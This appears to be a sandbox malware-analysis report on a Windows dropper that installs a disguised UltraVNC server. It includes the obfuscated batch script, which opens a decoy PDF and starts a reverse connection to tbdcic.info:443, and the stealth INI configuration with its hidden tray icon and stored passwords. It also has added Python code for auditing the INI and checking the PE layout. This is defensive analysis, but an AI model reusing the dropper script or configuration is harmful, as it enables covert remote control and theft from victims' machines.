                                                                  SHA-256:6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
                                                                  SHA-512:BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
                                                                  Malicious:false
                                                                  Preview:@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):867840
                                                                  Entropy (8bit):6.386550733462827
                                                                  Encrypted:false
                                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Generic INItialization configuration [admin]
                                                                  Category:dropped
                                                                  Size (bytes):858
                                                                  Entropy (8bit):5.216893826927931
                                                                  Encrypted:false
                                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                  Malicious:false
                                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1945368
                                                                  Entropy (8bit):6.532894678367002
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\WPSela.LSZr7V, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):867840
                                                                  Entropy (8bit):6.386550733462827
                                                                  Encrypted:false
                                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):605114
                                                                  Entropy (8bit):7.931189302613814
                                                                  Encrypted:false
                                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                  Malicious:false
                                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1945368
                                                                  Entropy (8bit):6.532894678367002
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Generic INItialization configuration [admin]
                                                                  Category:dropped
                                                                  Size (bytes):858
                                                                  Entropy (8bit):5.216893826927931
                                                                  Encrypted:false
                                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                  Malicious:false
                                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
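The same 858-byte UltraVNC.ini is dropped twice (once under its random staging name, once under its final name) and it is the part of the kit that turns a stock VNC server into a silent remote-access tool: the tray icon is suppressed, no Windows logon is required, file transfer and remote input are on, and the VNC password is stored in the usual fixed-key DES form, so anyone who can read the file can recover it. The following is an added example, not code from the report or from UltraVNC: it parses the INI as dropped and lists the settings a defender would want to see flagged. The INI text is transcribed from the preview above ('..' is a CRLF).

```python
"""Audit a dropped UltraVNC.ini for settings that enable silent remote access.

Added example; not code from the report.  ULTRAVNC_INI is transcribed from
the report's Preview field.
"""
import configparser

ULTRAVNC_INI = """\
[Permissions]
[admin]
LocalInputsDisabled=0
IdleTimeout=0
EnableJapInput=0
RemoveAero=0
DebugMode=0
Avilog=0
path=Y:
DebugLevel=0
AllowLoopback=0
LoopbackOnly=0
AllowShutdown=1
AllowProperties=1
AllowEditClients=1
FileTransferTimeout=40
KeepAliveInterval=4
SocketKeepAliveTimeout=14000
DisableTrayIcon=1
MSLogonRequired=0
NewMSLogon=0
ConnectPriority=0
QuerySetting=2
QueryTimeout=8
QueryAccept=0
LockSetting=0
RemoveWallpaper=0
RemoveEffects=0
RemoveFontSmoothing=0
FileTransferEnabled=1
FTUserImpersonation=1
BlankMonitorEnabled=0
BlankInputsOnly=0
DefaultScale=1
UseDSMPlugin=0
DSMPlugin=
DSMPluginConfig=
primary=1
secondary=0
SocketConnect=0
HTTPConnect=0
XDMCPConnect=0
AutoPortSelect=1
PortNumber=5628
HTTPPortNumber=5800
InputsEnabled=1
[UltraVNC]
passwd=F0111C75FCAEB30BD2
passwd2=F2102C75FCAEB11BD2
"""

# (section, key, value a locked-down server would carry, why the observed value matters)
CHECKS = [
    ("admin", "DisableTrayIcon", "0", "tray icon hidden: the user sees no sign of a running VNC server"),
    ("admin", "MSLogonRequired", "1", "no Windows account check: only the VNC password gates access"),
    ("admin", "FileTransferEnabled", "0", "file transfer on: files can be pushed to and pulled from the host"),
    ("admin", "InputsEnabled", "0", "remote keyboard and mouse control enabled, not view-only"),
    ("admin", "AllowShutdown", "0", "remote viewer may stop the server"),
    ("admin", "LoopbackOnly", "1", "not restricted to loopback, so no local tunnel sits in front of it"),
]


def parse_ini(text):
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True)
    cp.optionxform = str  # keep key case exactly as written in the file
    cp.read_string(text)
    return cp


def audit_ultravnc_ini(text):
    """Return the listening port and a dict of key -> finding for risky settings."""
    cp = parse_ini(text)
    findings = {}
    for section, key, hardened, note in CHECKS:
        observed = cp.get(section, key, fallback=None)
        if observed is not None and observed != hardened:
            findings[key] = f"{key}={observed}: {note}"
    if cp.has_option("UltraVNC", "passwd"):
        # 18 hex digits: 8 DES-encrypted bytes under the fixed VNC key plus one
        # trailing byte.  Anyone who can read the file can recover the password,
        # so the file itself is the secret to collect and to rotate.
        findings["passwd"] = "VNC password stored in fixed-key DES form"
    return {"port": cp.getint("admin", "PortNumber", fallback=None), "findings": findings}


if __name__ == "__main__":
    result = audit_ultravnc_ini(ULTRAVNC_INI)
    print("PortNumber:", result["port"])
    for finding in result["findings"].values():
        print(" -", finding)
```

Note that PortNumber=5628 is the inbound listener; in this sample the server is also started with -connect tbdcic.info:443, so the operator does not need that port reachable from outside. The checks table is deliberately data-driven so the same audit can be pointed at any UltraVNC.ini found during an incident.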
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.952472042394955
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:7q551ugrWe.exe
                                                                  File size:1'664'495 bytes
                                                                  MD5:d61940626fad051067bfd16f2ab4e657
                                                                  SHA1:cceaeda73fca724016bac0c9cb000fcd4ca1e523
                                                                  SHA256:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4
                                                                  SHA512:ca97c277acda035354e904e72dd9ab52547eec12f42cd3de5acd075e4af9785a807dfacfdfb65ffd43d88ee31eabc28d572a83d0599701fe7a1aa36bbd09f869
                                                                  SSDEEP:24576:WKWs4sgeV+OkCbkE/ClHrI3phRLFry+IVGjZP7gzF77/voe2D7UGxxy+vJy:TFFV+SbkE/yHkPRd4iazZoe2DNm
                                                                  TLSH:A1752351B6D3D8F4DA57227111B1AD132F63DD2A164128CF738DFA067A30683F92BA72
                                                                  File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................
                                                                  Icon Hash:357561d6dad24d55
                                                                  Entrypoint:0x41382f
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:1d1577d864d2da06952f7affd8635371
                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push FFFFFFFFh
                                                                  push 00416E98h
                                                                  push 004139C0h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  sub esp, 68h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-18h], esp
                                                                  xor ebx, ebx
                                                                  mov dword ptr [ebp-04h], ebx
                                                                  push 00000002h
                                                                  call dword ptr [004151DCh]
                                                                  pop ecx
                                                                  or dword ptr [0041B9E4h], FFFFFFFFh
                                                                  or dword ptr [0041B9E8h], FFFFFFFFh
                                                                  call dword ptr [004151E0h]
                                                                  mov ecx, dword ptr [004199C4h]
                                                                  mov dword ptr [eax], ecx
                                                                  call dword ptr [004151E4h]
                                                                  mov ecx, dword ptr [004199C0h]
                                                                  mov dword ptr [eax], ecx
                                                                  mov eax, dword ptr [004151E8h]
                                                                  mov eax, dword ptr [eax]
                                                                  mov dword ptr [0041B9E0h], eax
                                                                  call 00007FE541609D52h
                                                                  cmp dword ptr [00419780h], ebx
                                                                  jne 00007FE541609C3Eh
                                                                  push 004139B8h
                                                                  call dword ptr [004151ECh]
                                                                  pop ecx
                                                                  call 00007FE541609D24h
                                                                  push 00419050h
                                                                  push 0041904Ch
                                                                  call 00007FE541609D0Fh
                                                                  mov eax, dword ptr [004199BCh]
                                                                  mov dword ptr [ebp-6Ch], eax
                                                                  lea eax, dword ptr [ebp-6Ch]
                                                                  push eax
                                                                  push dword ptr [004199B8h]
                                                                  lea eax, dword ptr [ebp-64h]
                                                                  push eax
                                                                  lea eax, dword ptr [ebp-70h]
                                                                  push eax
                                                                  lea eax, dword ptr [ebp-60h]
                                                                  push eax
                                                                  call dword ptr [004151F4h]
                                                                  push 00419048h
                                                                  push 00419000h
                                                                  call 00007FE541609CDCh
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x17324          0xc8          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1c000          0x309f0       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x15000          0x364         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x130f0       0x13200   a86014994324ad6f47bddf386fd89176  False     0.6081495098039216  data       6.614408281478693   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x15000          0x3560        0x3600    9abc217bd20b39b1db2f57ddf9bc789c  False     0.4381510416666667  data       5.5938980842785995  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x19000          0x29ec        0x800     4c129856aeef51c872b4a2f6db01e9bd  False     0.44580078125       data       3.8126171673069433  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x1c000          0x309f0       0x30a00   32c6714aa776c8352eda97e813ef0b21  False     0.7375381587403599  data       7.293326377493547   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
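Two things in the static data above are worth checking numerically rather than by eye: the four sections account for only about 294 KB of a 1,664,495-byte file, so roughly 1.37 MB is an overlay that the loader never maps (where a self-extracting dropper keeps its payload; the dropped files total more than that, so the payload is stored compressed), and .rsrc is the only section whose entropy crosses the packed-data threshold, consistent with the 256x256 PNG icon and compressed resources rather than with packed code. The following is an added example, not code from the report: it re-runs those checks from the table values. Section alignment 0x1000, file alignment 0x200 and a 0x400-byte header block are assumptions (the table gives no raw offsets), all consistent with the addresses shown.

```python
"""Layout and overlay checks from the PE section table.

Added example; not code from the report.  Section values are copied from the
report's table; the three alignment/header constants are assumptions.
"""

FILE_SIZE = 1_664_495      # 'File size' field of the report
SECTION_ALIGN = 0x1000     # assumption, consistent with the VAs below
FILE_ALIGN = 0x200         # assumption, consistent with the raw sizes below
HEADER_SIZE = 0x400        # assumption: DOS stub + PE headers before .text

# (name, virtual address, virtual size, raw size, entropy) as reported
SECTIONS = [
    (".text",  0x1000,  0x130f0, 0x13200, 6.614408281478693),
    (".rdata", 0x15000, 0x3560,  0x3600,  5.5938980842785995),
    (".data",  0x19000, 0x29ec,  0x800,   3.8126171673069433),
    (".rsrc",  0x1c000, 0x309f0, 0x30a00, 7.293326377493547),
]


def align_up(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def check_layout(sections=SECTIONS):
    """Return anomalies: a gap or overlap between sections in memory, or raw
    data larger than the aligned virtual size (bytes the loader would drop)."""
    problems = []
    expected_va = sections[0][1]
    for name, va, vsize, raw, _ in sections:
        if va != expected_va:
            problems.append(f"{name}: VA {va:#x}, expected {expected_va:#x}")
        if raw > align_up(vsize, FILE_ALIGN):
            problems.append(f"{name}: raw size {raw:#x} exceeds virtual size {vsize:#x}")
        expected_va = va + align_up(vsize, SECTION_ALIGN)
    return problems


def overlay_size(file_size=FILE_SIZE, sections=SECTIONS):
    """Bytes after the last section's raw data: never mapped by the loader."""
    mapped = HEADER_SIZE + sum(section[3] for section in sections)
    return file_size - mapped


def flag_sections(sections=SECTIONS, packed_threshold=7.0):
    """Sections whose entropy suggests compressed or encrypted content."""
    return [name for name, _, _, _, entropy in sections if entropy >= packed_threshold]


if __name__ == "__main__":
    print("layout anomalies:", check_layout() or "none")
    print(f"overlay: {overlay_size():,} bytes ({overlay_size() / FILE_SIZE:.0%} of the file)")
    print("high-entropy sections:", flag_sections())
```

The whole-file entropy of 7.95 in the static summary, well above any single section, is the overlay showing through: most of the file is compressed payload, not code. With a copy of the sample the same three checks run on real raw offsets read from the section headers instead of the assumed contiguous layout.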
Name           RVA      Size    Type                                                                  Language  Country        ZLIB Complexity
RT_ICON        0x1c280  0x18de  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced           Russian   Russia         0.9696826892868363
RT_ICON        0x1db60  0x4228  Device independent bitmap graphic, 64 x 128 x 32, image size 16896    Russian   Russia         0.08974964572508266
RT_ICON        0x21d88  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600      Russian   Russia         0.12935684647302906
RT_ICON        0x24330  0x1a68  Device independent bitmap graphic, 40 x 80 x 32, image size 6720      Russian   Russia         0.16553254437869822
RT_ICON        0x25d98  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224      Russian   Russia         0.21106941838649157
RT_ICON        0x26e40  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 2400      Russian   Russia         0.29508196721311475
RT_ICON        0x277c8  0x6b8   Device independent bitmap graphic, 20 x 40 x 32, image size 1680      Russian   Russia         0.33313953488372094
RT_ICON        0x27e80  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088      Russian   Russia         0.4592198581560284
RT_GROUP_ICON  0x282e8  0x76    data                                                                  Russian   Russia         0.7457627118644068
RT_VERSION     0x28360  0x350   data                                                                                           0.4693396226415094
RT_MANIFEST    0x286b0  0x33c   ASCII text, with CRLF line terminators                                English   United States  0.501207729468599
DLL | Import
COMCTL32.dll | (no named imports listed)
SHELL32.dll | SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll | CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll | FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll | GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
ole32.dll | CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll | SysAllocString, VariantClear, OleLoadPicture
